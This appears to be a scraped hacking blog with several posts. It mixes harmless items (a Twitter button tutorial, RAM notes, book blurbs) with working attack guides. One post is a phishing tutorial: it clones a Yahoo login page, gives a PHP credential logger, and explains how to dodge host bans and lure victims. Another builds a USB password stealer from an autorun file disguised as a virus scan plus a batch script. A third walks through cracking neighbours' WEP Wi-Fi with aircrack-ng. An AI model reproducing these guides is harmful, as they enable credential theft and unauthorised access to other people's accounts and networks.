How you can creat Phisher

Requirements

1) A web hosting account
There are hundreds of websites available that offer free web hosting account, normally 100mb free with a Subdomain. Create a free web hosting account with Subdomain on any of them. The Problem with free hosting is that, as soon as they come to know that you have hosted phisher, they will Ban you. so the Smart choice is to Put some useful articles on the website that you will be getting at Doteasy Free Hosting and side by side you can also host phisher in the separate directory for example: yourname.domain.com/mywork.
Free Webhosting: Doteasy Free Hosting (read note below)
Note : Never use any suspicious keywords like gmail, facebook, hotmail, gmail-login, etc in the subdomain or username. if you use, you will get banned for sure. Instead use your own name or any other name.
2) A fake login page
To create a fake login page, just visit the desired login page. lets say yahoo’s login page. now Right Click on that page and click on ‘view source’ or view ‘page source’. after this a new window will open with the source code. just select all the code using ctrl+a and copy it with ctrl+c. open notepad and paste this code in it. and save it with extension .html on the desktop.
for eg:- yahoo.html
3) A php code that writes data on to a text file
Just copy the below php code in red and paste it in a notepad. after this save it as .php file on the desktop.
for eg:- code.php
<?php
header (‘Location: original login page’);
$handle = fopen(“passwords.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>

4) A text file to save hacked password
Just create an empty text file, name it as password.txt and save it on the desktop.
note- if you don’t create a text file, the ‘fopen’ command in code.php will automatically create a new text file

Creating phisher

Now we have the 3 required files yahoo.html,code.php,password.txt on the desktop.
The next task is to link(connect) the 3 files. such that we must link them in the order yahoo.html>>code.php>>passwords.txt.
ie yahoo.html must be able to communicate with code.php and further code.php must be able to communicate with passwords.txt
Linking yahoo.html and code.php
Just open yahoo.html with text editor and search for ‘action’ field ( Press ctrl+F to search). Upon finding ‘action’ field you will see something like this:

Replace everything in red with code.php, and save the file.

You just connected yahoo.html to code.php
[ * ] There may be more than one action field. follow the same procedure of Replacing with Code.php
Linking code.php and passwords.txt
In the above given code, passwords.txt is already connected with code.php.
Now just open code.php with text editor and  in the 2nd line replace “original login page” with the desired original login page of your phisher.
In our eg it is https://login.yahoo.com/config/login_verify2?&.src=ym and save it.
You just told code.php to open passwords.txt file when run and after the victim enters the login details, redirect him to the original login page.
Now that everything is ready, the next step is to host the phisher that you just created on to a free web hosting server.

Hosting Phisher

#step1 login to your newly created free hosting account
#step2 click on ‘file manager’ to open file manager
#step3 now navigate to your subdomain directory. to do so just click on your subdomain in the files view area.
#step4 Now just create a new directory(folder) and name it according to phisher you have created.
#step5 navigate to the desired directory that you just created in ‘step3′
#step6 Upload all the 3 files(phisher) ie yahoo.html,code.php,passwords.txt in this directory.
note- all the 3 files must be in the same directory.
#step7 copy the addresses of .html and .txt files
#step8 Send this phisher to your victim. just send the link (.html file’s address) to your victim via email or any other medium.
#step9 be patient . When the victim logs in on your fake page, the username and password gets stored in a test file ie. passwords.txt and now it can be opened any time to see the username and password.
That’s it! you are done. enjoy!

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

How To Add Official Twitter Follow Button to Blogger




Adding Twitter Follow Button to your website, making it easy for you to discover the Twitter accounts of your favorite reporters, athletes, celebrities, and other personalities. Using the Follow Button is as simple as a single click. You can also see the profile and latest Tweets of the account you want to follow by clicking the username next to the Button.

For publishers and brands, adding the Follow Button to your website and using Twitter to stay connected with your audience is a powerful combination. People who follow your account are much more likely to retweet and engage with your Tweets, and to repeatedly visit your website. Adding the Follow Button to your website is quick and easy.


Follow the steps given below add twitter follow button to your blog posts.

Step 1 : Go to "Edit HTML". Click on "Expand Widget Templates"

Step 2 : Scroll down to where you see below code:

<div class='post-header-line-1'/>

Step 6 : Now Copy below code and paste it just below the above code.

NOTE: If you can't find <div class='post-header-line-1'/> in your template, paste the code just before <data:post.body/> .


<div style='float:right;margin-right:5px;'>Your Twitter Code Here</div>

Now replace "Your Twitter Code Here" with the code, taken using below link:


Now save your template and you are done.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

XXS Attacks






Xss Attacks is a Great Book on Cross site Scripting.

Cross-site Scripting Fundamentals.
The XSS Discovery Toolkit
XSS Theory
XSS Attack Methods
Advanced XSS Attack Vectors
XSS Exploited
Exploit Frameworks
XSS Worms
Preventing XSS Attacks


                                                           

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

THE SECRET OF HACKING




Steps :-

download this ebook from below
Now open the .rar file and click on certificate.pfx
Then it will ask for password
Enter the password :- mh2005
Now open the hacking e-book provided1. INTRODUCTION TO REAL HACKING  

Topics:-

1. INTRODUCTION TO REAL HACKING
2. ADVANCED MALWARE RESEARCH
3. WINDOWS HACKING
4. PASSWORD HACKING
5. EMAIL HACKING
6. WEB APPLICATION HACKING
7. WEBSITE DEFACEMENT AND DOMAIN HACKING
8. MISCELLANEOUS HACKING
9. MOBILE AND COMPUTER FORENSIC
10. VOIP AND WIRELESS HACKING
11. VULNERABILITY DISCOVERY AND PENETRATION TESTING
12. ADVANCE HACKING WITH METASPLOIT
13. FIREWALL, IDS AND HONEY POT HACKING.
14. SECURING SYSTEM

File Information :-

Name :- THE SECRET OF HACKING 
Size :- 1.70 Mb

                                                      

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Ghost in the Wires by Kevin Mitnick




Kevin Mitnick was the most elusive computer break-in artist in history. He accessed computers and networks at the world's biggest companies--and however fast the authorities were, Mitnick was faster, sprinting through phone switches, computer systems, and cellular networks. He spent years skipping through cyberspace, always three steps ahead and labeled unstoppable. But for Kevin, hacking wasn't just about technological feats-it was an old fashioned confidence game that required guile and deception to trick the unwitting out of valuable information.

Driven by a powerful urge to accomplish the impossible, Mitnick bypassed security systems and blazed into major organizations including Motorola, Sun Microsystems, and Pacific Bell. But as the FBI's net began to tighten, Kevin went on the run, engaging in an increasingly sophisticated cat and mouse game that led through false identities, a host of cities, plenty of close shaves, and an ultimate showdown with the Feds, who would stop at nothing to bring him down.

Ghost in the Wires is a thrilling true story of intrigue, suspense, and unbelievable escape, and a portrait of a visionary whose creativity, skills, and persistence forced the authorities to rethink the way they pursued him, inspiring ripples that brought permanent changes in the way people and companies protect their most sensitive information.

                                                         

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

USB Stealer Steal Password

We Do use Pendrive/Usb Storage Device for different purpose but i am really interested in hacking friends password using USB Storage device.Sounds different but yes it is possible i found a way to perform it .

As we all know that windows stores most of its passwords on daily basis , Such as Msn messenger passwords,Yahoo passwords,Myspace passwords etc.Also you know know that there are many tools to recover Saved passwords,so in this article i will explain you on How to made a USB passwords stealer and steal saved passwords form remote Computer.

Before proceeding Download These Required Material

MessenPass - MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications:

Mail PassView - Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express,windows mail,POP3 etc

IE Passview: IE passview is a small program that helps us view stored passwords in Internet explorer.

Protected storage pass viewer(PSPV) - Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer.

Password fox:Password fox is a small program used to view Stored passwords in Mozilla Firefox.


Now Downloaded All the required things come to some real stuff

Note:Kindly disable your antivirus before performing these steps

Steps to create Own Usb Stealer

1.First of all download all 5 tools and copy the executables (.exe( files in your USB i.e. Copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan


save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB pendrive.


3. Create another Notepad and write the following text onto it.


start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt


save the Notepad and rename it from

New Text Document.txt to launch.bat


Copy the launch.bat file also to your USB drive.

Now your USB Password stealer is ready all you have to do is insert it in your victims computer and a popup will appear, in the popup window select the option (Launch virus scan) as soon as you will click it the following window will appear.


After this you can see saved password in .TXT files


  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Wifi Hacking

Wireless Wi-Fi Modem Network Hacking Complete Tutorial


Many of the friends ask me about how to hack wifi network .so here is the tutorial that will explain how to hack wifi.
In our daily life some time our laptop catching so many wi-fi signals but none of them is accessible..and we think “I wish I could some how break the password and access free internet”.
if you are thinking like that than this tutorial will definitely help you in cracking password of wi-fi network for free internet.
 
Tutorial on hacking wi-fi Network

First of all you need to scan for available wireless networks.

you can use“NetStumbler” or "Kismet" for Windows and Linux and KisMac for Mac
Below is a screenshot of NetStumbler.. It will show you a list of all the wireless access points in your range.

It’ll also show how the Wi-fi network is secured..

Now the main par comes The two most common encryption types are:
 
1) WEP (Wire Equivalent Privacy )

2) WAP(Wireless Application Protocol)



WEP allows a hacker to crack a WEP key easily whereas WAP is currently the most secure and best option to secure a wi-fi network

It can’t be easily cracked as WEP because the only way to retreive a WAP key is to use a brute-force attack or dictionary atack.
 
How to Crack WEP

This is the practically tested way to hack wi-fi network.

To crack WEP we will be using Live Linux distribution called BackTrack to crack WEP.

BackTrack have lots of preinstalled softwares but for this time

The tools we will be using on Backtrack are:

a)Kismet – a wireless network detector
b)airodump – captures packets from a wireless router
c)aireplay – forges ARP requests
d)aircrack – decrypts the WEP keys

 
Follow the steps One by One

1) First of all we have to find a wireless access point along with its bssid, essid and channel number. To do this we will run kismet by opening up the terminal and typing in kismet. It may ask you for the appropriate adapter which in my case is ath0. You can see your device’s name by typing in the command iwconfig.


2) To be able to do some of the later things, your wireless adapter must be put into monitor mode. Kismet automatically does this and as long as you keep it open, your wireless adapter will stay in monitor mode.


3) In kismet you will see the flags Y/N/0. Each one stands for a different type of encryption. In our case we will be looking for access points with the WEP encryption. Y=WEP N=OPEN 0=OTHER(usually WAP).


4) Once you find an access point, open a text document and paste in the networks broadcast name (essid), its mac address (bssid) and its channel number. To get the above information, use the arrow keys to select an access point and hit to get more information about it.

5) The next step is to start collecting data from the access point with airodump. Open up a new terminal and start airodump by typing in the command:

airodump-ng -c [channel#] -w [filename] –bssid [bssid] [device]

In the above command airodump-ng starts the program, the channel of your access point goes after -c , the file you wish to output the data goes after -w , and the MAC address of the access point goes after –bssid. The command ends with the device name. Make sure to leave out the brackets.


6) Leave the above running and open another terminal. Next we will generate some fake packets to the target access point so that the speed of the data output will increase. Put in the following command:

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55:66 -e [essid] [device]

In the above command we are using the airplay-ng program. The -1 tells the program the specific attack we wish to use which in this case is fake authentication with the access point. The 0 cites the delay between attacks, -a is the MAC address of the target access point, -h is your wireless adapters MAC address, -e is the name (essid) of the target access point, and the command ends with the your wireless adapters device name.


7) Now, we will force the target access point to send out a huge amount of packets that we will be able to take advantage of by using them to attempt to crack the WEP key. Once the following command is executed, check your airodump-ng terminal and you should see the ARP packet count to start to increase. The command is:

aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:5:66 [device]

In this command, the -3 tells the program the specific type of attack which in this case is packet injection, -b is the MAC address of the target access point, -h is your wireless adapters MAC address, and the wireless adapter device name goes at the end.
Once you have collected around 50k-500k packets, you may begin the attempt to break the WEP key. The command to begin the cracking process is:

aircrack-ng -a 1 -b [bssid] -n 128 [filename].ivs

In this command the -a 1 forces the program into the WEP attack mode, the -b is the targets MAC address, and the -n 128 tells the program the WEP key length. If you don’t know the -n , then leave it out. This should crack the WEP key within seconds. The more packets you capture, the bigger chance you have of cracking the WEP key.

Now you have learn how to hack wi-fi network.
This is the most practically way to hack wi-fi network working genuinely.Always put your try and i am sure this tutorial is helpful to you.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Introduction To Information Technology


What is a Computer?

A computer is an electronic device, operating under the control of instructions (software) stored in its own memory unit, that can accept data (input), manipulate data (process), and produce information (output) from the processing.

The computer has become an integral part of our lives.

Generally, the term is used to describe a collection of devices that function together as a system.

What Does A Computer Do?


Computers can perform four general operations, which comprise the information processing cycle.
  •     Input
  •      Process
  •     OutputStorage

File Password: mrtozzir



    • Digg
    • Del.icio.us
    • StumbleUpon
    • Reddit
    • RSS

    All About Random Access Memory(RAM) Part 2

    DRAM PM

    The DRAM (Dynamic RAM) is the most common type of memory at the start of this millennium. This is a memory whose transistors are arranged in a matrix in rows and columns. A transistor, coupled with a capacitor, gives information on a bit. Since 1 octet contains 8 bits, a DRAM memory module of 256 Mo will thus contain 256 * 2^10 * 2^10 = 256 * 1024 * 1024 = 268,435,456 octets = 268,435,456 * 8 = 2,147,483,648 bits = 2,147,483,648 transistors. A module of 256 Mo thus has a capacity of 268,435,456 octets, or 268 Mo! These memories have access times of 60 ns.
    Furthermore, access to memory generally concerns data stored consecutively in the memory. Thus burst mode allows access to the three pieces of data following the first piece with no additional latency time. In this burst mode, time required to access the first piece of data is equal to cycle time plus latency time, and the time required to access the other three pieces of data is equal to just the cycle time; the four access times are thus written in the form X-Y-Y-Y, for example 5-3-3-3 indicates a memory for which 5 clock cycles are needed to access the first piece of data and 3 for the subsequent ones.

    DRAM FPM

    To speed up access to the DRAM, there is a technique, known as paging, which involves accessing data located in the same column by changing only the address of the row, thus avoiding repetition of the column number between reading of each row. This is known as DRAM FPM (Fast Page Mode). FPM achieves access times of around 70 to 80 nanoseconds for operating frequency between 25 and 33 Mhz.

    DRAM EDO

    DRAM EDO (Extended Data Out, sometimes also called hyper-page") was introduced in 1995. The technique used with this type of memory involves addressing the next column while reading the data in a column. This creates an overlap of access thus saving time on each cycle. EDO memory access time is thus around 50 to 60 nanoseconds for operating frequency between 33 and 66 Mhz.
    Thus the RAM EDO, when used in burst mode, achieves 5-2-2-2 cycles, representing a gain of 4 cycles on access to 4 pieces of data. Since the EDO memory did not work with frequencies higher than 66 Mhz, it was abandoned in favour of the SDRAM.

    SDRAM

    The SDRAM (Synchronous DRAM), introduced in 1997, allows synchronised reading of data with the mother-board bus, unlike the EDO and FPM memories (known as asynchronous) which have their own clock. The SDRAM thus eliminates waiting times due to synchronisation with the mother-board. This achieves a 5-1-1-1 burst mode cycle, with a gain of 3 cycles in comparison with the RAM EDO. The SDRAM is thus able to operate with frequency up to 150 Mhz, allowing it to achieve access times of around 10 ns.

    DR-SDRAM (Rambus DRAM)

    The DR-SDRAM (Direct Rambus DRAM) is a type of memory that lets you transfer data to a 16-bit bus at frequency of 800Mhz, giving it a bandwidth of 1.6 Go/s. As with the SDRAM, this type of memory is synchronised with the bus clock to enhance data exchange. However, the RAMBUS memory is a proprietary technology, meaning that any company wishing to produce RAM modules using this technology must pay royalties to both RAMBUS and Intel.

    DDR-SDRAM

    The DDR-SDRAM (Double Data Rate SDRAM) is a memory, based on the SDRAM technology, which doubles the transfer rate of the SDRAM using the same frequency.
    Data are read or written into memory based on a clock. Standard DRAM memories use a method known as SDR (Single Data Rate) involving reading or writing a piece of data at each leading edge.
    The DDR doubles the frequency of reading/writing, with a clock at the same frequency, by sending data to each leading edge and to each trailing edge.

    • Digg
    • Del.icio.us
    • StumbleUpon
    • Reddit
    • RSS